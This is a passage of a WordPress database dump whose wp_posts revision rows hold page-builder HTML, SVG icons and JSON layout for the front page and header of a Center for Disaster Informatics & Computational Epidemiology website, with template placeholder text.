d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:42:03','2022-02-16 15:42:03','',22,'https://gsudice.dataconn.net/?p=311',0,'revision','',0),(315,1,'2022-02-16 15:43:42','2022-02-16 15:43:42','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:43:42','2022-02-16 15:43:42','',168,'https://gsudice.dataconn.net/?p=315',0,'revision','',0),(316,1,'2022-02-16 15:43:42','2022-02-16 15:43:42','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">population disparities</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:43:42','2022-02-16 15:43:42','',20,'https://gsudice.dataconn.net/?p=316',0,'revision','',0),(317,1,'2022-02-16 15:43:42','2022-02-16 15:43:42','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:43:42','2022-02-16 15:43:42','',23,'https://gsudice.dataconn.net/?p=317',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (318,1,'2022-02-16 15:43:42','2022-02-16 15:43:42','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center 